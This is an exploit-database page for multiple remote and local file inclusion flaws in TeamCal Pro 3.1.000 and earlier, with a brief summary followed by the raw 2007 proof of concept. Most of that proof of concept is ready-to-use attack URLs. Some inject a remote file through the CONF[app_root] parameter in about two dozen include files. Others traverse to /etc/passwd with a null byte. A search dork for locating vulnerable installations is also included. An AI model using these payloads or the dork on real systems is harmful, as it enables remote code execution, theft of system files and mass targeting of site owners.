TeamCal Pro - exploit.company

vendor:

TeamCal Pro

by:

7.5

CVSS

HIGH

RFI / LFI

CWE

Product Name: TeamCal Pro

Affected Version From: TeamCal Pro <= 3.1.000

Affected Version To: TeamCal Pro <= 3.1.000

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

TeamCal Pro <= 3.1.000 Multiple RFI / LFI Vulnerabilities

Multiple Remote File Inclusion (RFI) and Local File Inclusion (LFI) vulnerabilities exist in TeamCal Pro version 3.1.000 and earlier. These vulnerabilities allow an attacker to include arbitrary remote or local files, potentially leading to remote code execution or information disclosure.

Mitigation:

Upgrade to a patched version of TeamCal Pro.

Source

Exploit-DB raw data:

  ##############             ######  ######                  ########           ########                ######  ######
  ##    ##    ##               ##      ##                  ##      ##          ##      ##                 ####  ####  
        ##       ####  ######    ##  ##      ########    ##                  ##             ########      ####  ####  
        ##         ####          ##  ##    ##        ##  ##                  ##           ##        ##    ##  ##  ##  
        ##         ##              ##        ##########  ##      ######      ##           ##        ##    ##  ##  ##  
        ##         ##              ##      ##        ##  ##        ##        ##           ##        ##    ##      ##  
        ##         ##              ##      ##        ##    ##      ##   ####   ##      ## ##        ##    ##      ##  
      ######     ##########      ######      ##########      ######     ####     ######     ########    ######  ######



                   TeamCal Pro <= 3.1.000 Multiple RFI / LFI Vulnerabilities
                   Script: http://www.lewe.com/index.php?option=com_docman&task=cat_view&gid=112&Itemid=27
                   POC :
                   http://localhost/ScriptPage/includes/tcuser.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/absencecount.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/avatar.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/csvhandler.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/functions.tcpro.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/header.html.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/joomlajack.tcpro.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/menu.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/other.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcabsence.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcabsencegroup.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcallowance.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcannouncement.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcconfig.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcdaynote.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcgroup.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tclogin.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcmonth.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tctemplate.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcuser.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcusergroup.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcuseroption.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage//index.php?lang=../../../../../../../../etc/passwd%00
                   http://localhost/ScriptPage//register.php?lang=../../../../../../../../etc/passwd%00
                   http://localhost/ScriptPage/login.php?lang=../../../../../../../../etc/passwd%00
                   http://localhost/ScriptPage/statistics.php?lang=../../../../../../../../etc/passwd%00                   
                   
                   Dork : http://www.google.com.sa/search?q=Powered+by+TeamCal+Pro&ie=utf-8&oe=utf-8&rls=org.mozilla:ar:official&client=firefox-a
                   SP.Thanx To : Tryag.Com/cc [Tryag-Team]

# milw0rm.com [2007-12-25]